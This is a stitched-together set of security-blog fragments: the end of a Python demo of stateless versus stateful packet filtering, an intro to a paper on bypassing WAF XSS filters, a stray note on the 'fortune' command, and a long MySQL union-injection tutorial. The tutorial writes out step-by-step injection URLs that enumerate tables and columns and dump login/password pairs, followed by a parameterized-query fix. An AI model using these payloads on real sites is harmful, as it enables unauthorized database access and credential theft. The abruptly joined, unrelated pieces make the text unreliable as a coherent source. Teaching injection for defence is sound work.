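    """Remembers outbound flows and admits inbound packets only when they match the
    reverse 5-tuple of a flow already seen, so a forged source port is not enough."""

    def __init__(self) -> None:
        self.flows = set()

    def decide(self, p: Packet) -> str:
        if is_internal(p.src):
            self.flows.add((p.proto, p.src, p.sport, p.dst, p.dport))
            return "ACCEPT"
        reverse = (p.proto, p.dst, p.dport, p.src, p.sport)
        return "ACCEPT" if reverse in self.flows else "DROP"


# Constructed traffic: one genuine request/reply pair, then two unsolicited inbound
# packets that set source port 80 to look like web replies.
TRAFFIC = [
    Packet("10.0.0.5", 51000, "203.0.113.10", 80, "tcp"),   # client -> web server
    Packet("203.0.113.10", 80, "10.0.0.5", 51000, "tcp"),   # genuine reply
    Packet("198.51.100.7", 80, "10.0.0.5", 22, "tcp"),      # unsolicited, forged sport
    Packet("198.51.100.7", 80, "10.0.0.9", 3389, "tcp"),    # unsolicited, forged sport
]


def run(fw, packets) -> list:
    """Return the verdict for each packet in order."""
    return [fw.decide(p) for p in packets]


if __name__ == "__main__":
    print("stateless:", run(StatelessFilter(), TRAFFIC))
    print("stateful: ", run(StatefulFilter(), TRAFFIC))
```

The stateless filter accepts all four packets, because the last two satisfy its reply rule; the stateful filter accepts the request and the matching reply and drops the two packets for which no outbound flow exists. Real connection tracking also ages entries out and handles TCP state and helper protocols such as FTP, which this model leaves out.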




Bypassing Modern WAF's XSS Filters - Cheat Sheet



Last month I was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architecture" as a semester project. I was particularly interested in writing security-related material, whether related to computer architecture, networks, etc. However, I found that a lot of work had already been done on architecture-level security. Therefore, I convinced my teacher that I would write on "Bypassing Modern Web Application Firewalls", as some of you might know that most of my research relates to client-side vulnerabilities and bypassing WAFs.


In my day-to-day job as a penetration tester, I very often encounter a web application firewall/filter that looks for malicious traffic inside the HTTP request and filters it out; some of them are easy to break and some are very hard. However, in one context or another, all the WAFs I have encountered are bypassable at some point.

RSnake's XSS cheat sheet was one of the best resources available for bypassing WAFs; however, over time, as browsers got updated, many of the vectors stopped working on newer browsers. Therefore there was a need to create a new cheat sheet. Over time I have developed my own methodology for bypassing WAFs, and that is what I have written the paper on. The paper talks specifically about bypassing XSS filters; as for SQLi, RCE etc., I thought to write a different paper, as the techniques differ in many cases.

  Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters




Fortune in kali linux

When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories, where each category is sub-divided into those which are potentially offensive and those which are not.


1. How to install Fortune: open a terminal, type apt-get install fortune and press Enter.

2. Fortune prints a random, hopefully interesting, adage.
Syntax: /usr/games/fortune

3. If you are logged in as a normal user (not root), the command syntax changes.
Ex: hell@MrQuiety:/root$ fortune

Understanding This Technique Called MySQL Injection

ABSTRACT

It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity.
Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of the mental response. To explain more comprehensively: we humans tend to err, and for this reason we are the best tool for finding these errors; even professional software for vulnerability analysis and scanning was developed by us.

Understand the technique MySQL Injection

One of the best-known attack techniques facing web developers is SQL Injection. It is the manipulation of a SQL statement using the variables that make up the parameters received by a server-side script, and it is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query by manipulating the input data of an application.

STEP BY STEP


Figure 1) Detecting.


Finding the number of columns: we first test until an error appears; once no error is returned, the column count has been found.


Figure 2) SQL error.

Host Information,
Version of MySQL system used on the server.


Figure 3) Host Information.



Figure 4) Location of the files

The current database used by the connection between the application's input and the MySQL system.


Figure 5) Users of MySQL.


Figure 6) Current Time.

Brute Force or Shooting

This applies to versions below 5.x.y, which have no information_schema, so table names have to be guessed.


Figure 7) Testing.

Dump
This applies to versions 5.x.y and above [ 1st Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Finding the column(s) of a given table
* Brute Force / Shooting
This applies to versions below 5.x.y, where column names have to be guessed.
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This applies to versions 5.x.y and above [ 1st Method ]
"usuarios" in hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

"usuarios" in decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where
table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
text
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select
1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_RHA_ : infosec1337' at line 1

=--------------------------=
Concat
group_concat() => concatenates the values of every matching row into one string
concat() => concatenates its arguments for a single row
concat_ws() => concatenates with a separator, given as the first argument
Hexadecimal (string literals written as hex so that no quotes are needed)
0x3a => :
0x20 => space
0x2d => -
0x2b => +
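Every request above works for the same reason: query.php pastes the string parameter straight into the SQL text, so "1 union all select ..." becomes part of the statement. The added example below (Python with the standard sqlite3 module standing in for MySQL; this is not the article's query.php and all table names, rows and credentials are constructed) shows the vulnerable lookup next to its fix: binding the value as a parameter, and validating that an id is an integer before querying at all. The injected input is the page's group_concat extraction against usuarios, adapted to single-argument group_concat, which is what SQLite supports.

```python
import sqlite3

# SQLite stands in for MySQL: the injection and the fix are the same in both.
# Tables, rows and passwords below are constructed for this example.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE noticias (id INTEGER, titulo TEXT, corpo TEXT, autor TEXT, data TEXT);
        INSERT INTO noticias VALUES (1, 'Hello', 'first post', 'admin', '2014-01-01');
        INSERT INTO noticias VALUES (2, 'Second', 'second post', 'admin', '2014-01-02');
        CREATE TABLE usuarios (id INTEGER, login TEXT, passwd TEXT, texto TEXT);
        INSERT INTO usuarios VALUES (1, '_Rafa_', 'constructed-pw-1', '');
        INSERT INTO usuarios VALUES (2, 'greyhats', 'constructed-pw-2', '');
    """)
    return conn


# The page's injected value, adapted to SQLite's single-argument group_concat().
INJECTED = "1 union all select 1,2,3,4,group_concat(login) from usuarios--"

# Five selected columns, matching the 'select 1,2,3,4,...' shape used on the page.
QUERY = "SELECT id, titulo, corpo, autor, data FROM noticias WHERE id = "


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """What query.php does: the parameter is concatenated into the SQL text, so the
    database parses and executes whatever the user typed."""
    return conn.execute(QUERY + user_input).fetchall()


def parameterized_lookup(conn: sqlite3.Connection, user_input) -> list:
    """The fix: the value travels as a bound parameter and is compared as data;
    it can never be parsed as SQL, whatever it contains."""
    return conn.execute(QUERY + "?", (user_input,)).fetchall()


def is_valid_id(user_input: str) -> bool:
    """Input validation on top of binding: an id must be a non-negative integer."""
    return user_input.strip().isdigit()


def strict_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Validate first, then bind: malformed ids are rejected before any SQL runs."""
    if not is_valid_id(user_input):
        raise ValueError("id must be a positive integer")
    return parameterized_lookup(conn, int(user_input))


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:   ", vulnerable_lookup(db, INJECTED))
    print("parameterized:", parameterized_lookup(db, INJECTED))
```

With the injected input the vulnerable lookup returns the real row plus a second row whose fifth column is the concatenated login list, which is exactly the leak shown in the screenshots above; the parameterized lookup returns no rows at all, because the whole string is compared against the id column as a value. Most MySQL client libraries offer the same binding through prepared statements, and the validation step is cheap insurance for numeric identifiers.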

Readers, this article is for educational purposes only; I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of such manipulation may provide unauthorized access to a restricted area, imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other outcomes. So I want to emphasize that this paper is for security researchers and developers, so that they are aware and test their code.

CONCLUSION

Many companies publish important information on their websites and in their databases; information is their most valuable intangible asset, and the question is how developers are dealing with this huge responsibility.
The challenge is to develop increasingly innovative sites, coupled with mechanisms that provide security to users.
The purpose of this paper is to present what SQL Injection is, how applications are exploited, and techniques for testing, allowing developers to build more robust systems and understand the vulnerability.

ABOUT THE AUTHOR:

This is a guest post written by RAFAEL FONTES SOUZA. He is the maintainer of the "Project Backtrack Team Brazilian" and works at RHAinfosec as a senior penetration tester. He is also the founder of "Wikileaks and Intelligence, Cypherpunks". He communicates well with groups and the general public, attended college projects with a focus on business organization, and currently seeks work experience outside of Brazil. He frequently contributes at RHA and talks about various topics related to internet security.
